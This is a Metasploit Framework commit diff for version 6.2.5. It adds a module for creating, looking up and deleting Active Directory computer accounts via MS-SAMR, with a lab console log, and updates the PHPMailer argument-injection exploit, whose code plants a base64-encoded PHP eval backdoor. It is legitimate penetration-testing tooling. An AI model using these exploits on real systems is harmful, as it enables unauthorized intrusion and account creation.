automatic module_metadata_base.json update

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.2.4)
+    metasploit-framework (6.2.5)
       actionpack (~> 6.0)
       activerecord (~> 6.0)
       activesupport (~> 6.0)
@@ -383,7 +383,7 @@ GEM
       rex-socket
       rex-text
     rex-struct2 (0.1.3)
-    rex-text (0.2.37)
+    rex-text (0.2.38)
     rex-zip (0.1.4)
       rex-text
     rexml (3.2.5)
@@ -427,7 +427,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.1.3)
+    ruby_smb (3.1.5)
       bindata
       openssl-ccm
       openssl-cmac

LICENSE_GEMS

@@ -70,9 +70,9 @@ memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.4, "New BSD"
 metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.2.4, "New BSD"
+metasploit-framework, 6.2.5, "New BSD"
 metasploit-model, 4.0.4, "New BSD"
-metasploit-payloads, 2.0.93, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.94, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
 metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT

db/modules_metadata_base.json

@@ -537,6 +537,56 @@
     "session_types": false,
     "needs_cleanup": false
   },
+  "auxiliary_admin/dcerpc/samr_computer": {
+    "name": "SAMR Computer Management",
+    "fullname": "auxiliary/admin/dcerpc/samr_computer",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "JaGoTu",
+      "Spencer McIntyre"
+    ],
+    "description": "Add, lookup and delete computer accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain. Administrative privileges however are required to delete the\n          created accounts.",
+    "references": [
+      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-06-28 11:53:05 +0000",
+    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
+    "is_install_path": true,
+    "ref_name": "admin/dcerpc/samr_computer",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+
+      ],
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
   "auxiliary_admin/dns/dyn_dns_update": {
     "name": "DNS Server Dynamic Update Record Injection",
     "fullname": "auxiliary/admin/dns/dyn_dns_update",
@@ -73335,7 +73385,7 @@
     "description": "This module exploits a buffer overflow in the RTSP request parsing\n        code of Hikvision DVR appliances. The Hikvision DVR devices record\n        video feeds of surveillance cameras and offer remote administration\n        and playback of recorded footage.\n\n        The vulnerability is present in several models / firmware versions\n        but due to the available test device this module only supports\n        the DS-7204 model.",
     "references": [
       "CVE-2014-4880",
-      "URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
+      "URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities"
     ],
     "platform": "Linux",
     "arch": "armle",
@@ -73350,7 +73400,7 @@
       "DS-7204 Firmware V2.2.10 build 131009",
       "Debug Target"
     ],
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-06-22 15:49:43 +0000",
     "path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
     "is_install_path": true,
     "ref_name": "linux/misc/hikvision_rtsp_bof",
@@ -87842,7 +87892,7 @@
       "PHPMailer <5.2.18",
       "PHPMailer 5.2.18 - 5.2.19"
     ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-29 12:24:29 +0000",
     "path": "/modules/exploits/multi/http/phpmailer_arg_injection.rb",
     "is_install_path": true,
     "ref_name": "multi/http/phpmailer_arg_injection",
@@ -95463,7 +95513,7 @@
       "Linux",
       "Windows"
     ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-06-28 17:02:51 +0000",
     "path": "/modules/exploits/multi/misc/nomad_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/misc/nomad_exec",
@@ -95474,11 +95524,11 @@
       "Stability": [
         "crash-safe"
       ],
-      "Reliability": [
+      "SideEffects": [
         "artifacts-on-disk",
         "ioc-in-logs"
       ],
-      "SideEffects": [
+      "Reliability": [
         "repeatable-session"
       ]
     },

documentation/modules/auxiliary/admin/dcerpc/samr_computer.md

@@ -0,0 +1,100 @@
+## Vulnerable Application
+Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
+computers to the domain. Administrative privileges however are required to delete the created accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### COMPUTER_NAME
+
+The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
+
+### COMPUTER_PASSWORD
+
+The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
+will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
+used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
+will be used.
+
+### DELETE_COMPUTER
+
+Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
+
+### LOOKUP_COMPUTER
+
+Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
+(SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS             192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass            Password1        no        The password for the specified username
+   SMBUser            aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
+
+msf6 auxiliary(admin/dcerpc/samr_computer) >
+```

documentation/modules/exploit/multi/http/phpmailer_arg_injection.md

@@ -18,6 +18,17 @@ exploitation can take a few minutes.
   6.  Verify the module yields a PHP meterpreter session in < 5 minutes
   7.  Verify the malicious PHP file was automatically removed
 
+## Options
+
+### WAIT_TIMEOUT
+Seconds to wait to trigger the payload
+### NameField
+Name of the element for the Name field
+### EmailField
+Name of the element for the Email field
+### MessageField
+Name of the element for the Message field
+
 ## Scenarios
 
   Demo taken directly from [PR7768](https://github.com/rapid7/metasploit-framework/pull/7768)

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "6.2.4"
+      VERSION = "6.2.5"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

modules/auxiliary/admin/dcerpc/samr_computer.rb

@@ -0,0 +1,249 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'ruby_smb/dcerpc/client'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SAMR Computer Management',
+        'Description' => %q{
+          Add, lookup and delete computer accounts via MS-SAMR. By default
+          standard active directory users can add up to 10 new computers to the
+          domain. Administrative privileges however are required to delete the
+          created accounts.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'JaGoTu', # @jagotu Original Impacket code
+          'Spencer McIntyre',
+        ],
+        'References' => [
+          ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py'],
+        ],
+        'Notes' => {
+          'Reliability' => [],
+          'Stability' => [],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Actions' => [
+          [ 'ADD_COMPUTER', { 'Description' => 'Add a computer account' } ],
+          [ 'DELETE_COMPUTER', { 'Description' => 'Delete a computer account' } ],
+          [ 'LOOKUP_COMPUTER', { 'Description' => 'Lookup a computer account' } ]
+        ],
+        'DefaultAction' => 'ADD_COMPUTER'
+      )
+    )
+
+    register_options([
+      OptString.new('COMPUTER_NAME', [ false, 'The computer name' ]),
+      OptString.new('COMPUTER_PASSWORD', [ false, 'The password for the new computer' ], conditions: %w[ACTION == ADD_COMPUTER]),
+      Opt::RPORT(445)
+    ])
+  end
+
+  def connect_samr
+    vprint_status('Connecting to Security Account Manager (SAM) Remote Protocol')
+    samr = @tree.open_file(filename: 'samr', write: true, read: true)
+
+    vprint_status('Binding to \\samr...')
+    samr.bind(endpoint: RubySMB::Dcerpc::Samr)
+    vprint_good('Bound to \\samr')
+
+    samr
+  end
+
+  def run
+    begin
+      connect
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    end
+    report_service(
+      host: rhost,
+      port: rport,
+      host_name: simple.client.default_name,
+      proto: 'tcp',
+      name: 'smb',
+      info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"
+    )
+
+    begin
+      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+    rescue RubySMB::Error::RubySMBError => e
+      fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
+    end
+
+    begin
+      @samr = connect_samr
+      @server_handle = @samr.samr_connect
+    rescue RubySMB::Dcerpc::Error::FaultError => e
+      elog(e.message, error: e)
+      fail_with(Failure::UnexpectedReply, "Connection failed (DCERPC fault: #{e.status_name})")
+    end
+
+    if datastore['SMBDomain'].blank? || datastore['SMBDomain'] == '.'
+      all_domains = @samr.samr_enumerate_domains_in_sam_server(server_handle: @server_handle).map(&:to_s).map(&:encode)
+      all_domains.delete('Builtin')
+      if all_domains.empty?
+        fail_with(Failure::NotFound, 'No domains were found on the SAM server.')
+      elsif all_domains.length > 1
+        print_status("Enumerated domains: #{all_domains.join(', ')}")
+        fail_with(Failure::BadConfig, 'The SAM server has more than one domain, the target must be specified.')
+      end
+
+      @domain_name = all_domains.first
+      print_status("Using automatically identified domain: #{@domain_name}")
+    else
+      @domain_name = datastore['SMBDomain']
+    end
+
+    @domain_sid = @samr.samr_lookup_domain(server_handle: @server_handle, name: @domain_name)
+    @domain_handle = @samr.samr_open_domain(server_handle: @server_handle, domain_id: @domain_sid)
+    send("action_#{action.name.downcase}")
+  rescue RubySMB::Dcerpc::Error::DcerpcError => e
+    elog(e.message, error: e)
+    fail_with(Failure::UnexpectedReply, e.message)
+  rescue RubySMB::Error::RubySMBError
+    elog(e.message, error: e)
+    fail_with(Failure::Unknown, e.message)
+  end
+
+  def random_hostname(prefix: 'DESKTOP')
+    "#{prefix}-#{Rex::Text.rand_base(8, '', ('A'..'Z').to_a + ('0'..'9').to_a)}$"
+  end
+
+  def action_add_computer
+    if datastore['COMPUTER_NAME'].blank?
+      computer_name = random_hostname
+      4.downto(0) do |attempt|
+        break if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ]).nil?
+
+        computer_name = random_hostname
+        fail_with(Failure::BadConfig, 'Could not find an unused computer name.') if attempt == 0
+      end
+    else
+      computer_name = datastore['COMPUTER_NAME']
+      if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+        fail_with(Failure::BadConfig, 'The specified computer name already exists.')
+      end
+    end
+
+    result = @samr.samr_create_user2_in_domain(
+      domain_handle: @domain_handle,
+      name: computer_name,
+      account_type: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT,
+      desired_access: RubySMB::Dcerpc::Samr::USER_FORCE_PASSWORD_CHANGE | RubySMB::Dcerpc::Samr::MAXIMUM_ALLOWED
+    )
+
+    user_handle = result[:user_handle]
+    if datastore['COMPUTER_PASSWORD'].blank?
+      password = Rex::Text.rand_text_alphanumeric(32)
+    else
+      password = datastore['COMPUTER_PASSWORD']
+    end
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_INTERNAL4_INFORMATION_NEW,
+      member: RubySMB::Dcerpc::Samr::SamprUserInternal4InformationNew.new(
+        i1: {
+          password_expired: 1,
+          which_fields: RubySMB::Dcerpc::Samr::USER_ALL_NTPASSWORDPRESENT | RubySMB::Dcerpc::Samr::USER_ALL_PASSWORDEXPIRED
+        },
+        user_password: {
+          buffer: RubySMB::Dcerpc::Samr::SamprEncryptedUserPasswordNew.encrypt_password(
+            password,
+            @simple.client.application_key
+          )
+        }
+      )
+    )
+    @samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_CONTROL_INFORMATION,
+      member: RubySMB::Dcerpc::Samr::UserControlInformation.new(
+        user_account_control: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT
+      )
+    )
+    @samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+    print_good("Successfully created #{@domain_name}\\#{computer_name} with password #{password}")
+    report_creds(@domain_name, computer_name, password)
+  end
+
+  def action_delete_computer
+    fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?
+    computer_name = datastore['COMPUTER_NAME']
+
+    details = @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+    fail_with(Failure::BadConfig, 'The specified computer was not found.') if details.nil?
+    details = details[computer_name]
+
+    handle = @samr.samr_open_user(domain_handle: @domain_handle, user_id: details[:rid])
+    @samr.samr_delete_user(user_handle: handle)
+    print_good('The specified computer has been deleted.')
+  end
+
+  def action_lookup_computer
+    fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?
+    computer_name = datastore['COMPUTER_NAME']
+
+    details = @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+    if details.nil?
+      print_error('The specified computer was not found.')
+      return
+    end
+    details = details[computer_name]
+    sid = @samr.samr_rid_to_sid(object_handle: @domain_handle, rid: details[:rid]).to_s
+    print_good("Found #{@domain_name}\\#{computer_name} (SID: #{sid})")
+  end
+
+  def report_creds(domain, username, password)
+    service_data = {
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: password,
+      private_type: :password,
+      username: username,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: domain
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+end

modules/exploits/linux/misc/hikvision_rtsp_bof.rb

@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'CVE', '2014-4880' ],
-          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
+          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]
         ],
       'Platform'       => 'linux',
       'Arch'           => ARCH_ARMLE,

modules/exploits/multi/http/phpmailer_arg_injection.rb

@@ -60,7 +60,10 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
     register_advanced_options(
       [
-        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
+        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300]),
+        OptString.new('NameField', [true, 'Name of the element for the Name field', 'name'], regex: /^([^\t\n\f \/>"'=]+)$/),
+        OptString.new('EmailField', [true, 'Name of the element for the Email field', 'email'], regex: /^([^\t\n\f \/>"'=]+)$/),
+        OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'], regex: /^([^\t\n\f \/>"'=]+)$/)
       ])
   end
 
@@ -98,6 +101,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    name_field = datastore['NameField']
+    email_field = datastore['EmailField']
+    message_field = datastore['MessageField']
     payload_file_name = "#{rand_text_alphanumeric(8)}.php"
     payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
@@ -111,9 +117,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     data = Rex::MIME::Message.new
     data.add_part('submit', nil, nil, 'form-data; name="action"')
-    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
-    data.add_part(email, nil, nil, 'form-data; name="email"')
-    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
+    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, "form-data; name='#{name_field}'")
+    data.add_part(email, nil, nil, "form-data; name='#{email_field}'")
+    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, "form-data; name='#{message_field}'")
 
     print_status("Writing the backdoor to #{payload_file_path}")
     res = send_request_cgi(

modules/exploits/multi/misc/nomad_exec.rb

@@ -52,8 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2021-05-17',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
-          'SideEffects' => [REPEATABLE_SESSION]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
         }
       )
     )